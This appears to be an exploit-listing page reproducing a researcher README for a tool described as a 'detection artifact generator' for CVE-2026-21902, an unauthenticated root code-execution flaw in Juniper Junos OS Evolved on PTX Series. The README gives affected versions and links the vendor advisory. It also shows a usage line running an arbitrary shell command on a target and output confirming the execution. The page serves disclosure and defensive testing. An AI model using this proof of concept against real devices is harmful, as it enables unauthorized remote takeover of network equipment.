Share
## https://sploitus.com/exploit?id=5A3EACA7-5699-53EF-837F-087B89D53298
# watchTowr-vs-JunosEvolved-CVE-2026-21902

Detection Artifact Generator for Juniper Junos Evolved CVE-2026-21902.

https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc

See our [blog post](https://labs.watchtowr.com/) for technical details.

# Detection in Action

```
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(   \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-JunosEvolved-CVE-2026-21902.py

        (*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-21902]


[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
```

# Description

This script attempts to detect if Junos Evolved OS & PTX Series is vulnerable to CVE-2026-21902.

# Affected Versions

This issue affects Junos OS Evolved on PTX Series:
* 25.4 versions before 25.4R1-S1-EVO, 25.4R2-EVO.

This issue does not affect Junos OS Evolved versions before 25.4R1-EVO.

This issue does not affect Junos OS.

For more information read the advisory [Junos OS Evolved: PTX Series: A vulnerability allows a unauthenticated, network-based attacker to execute code as root](https://supportportal.juniper.net/s/article/2026-02-Out-of-Cycle-Security-Bulletin-Junos-OS-Evolved-PTX-Series-A-vulnerability-allows-a-unauthenticated-network-based-attacker-to-execute-code-as-root-CVE-2026-21902).


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber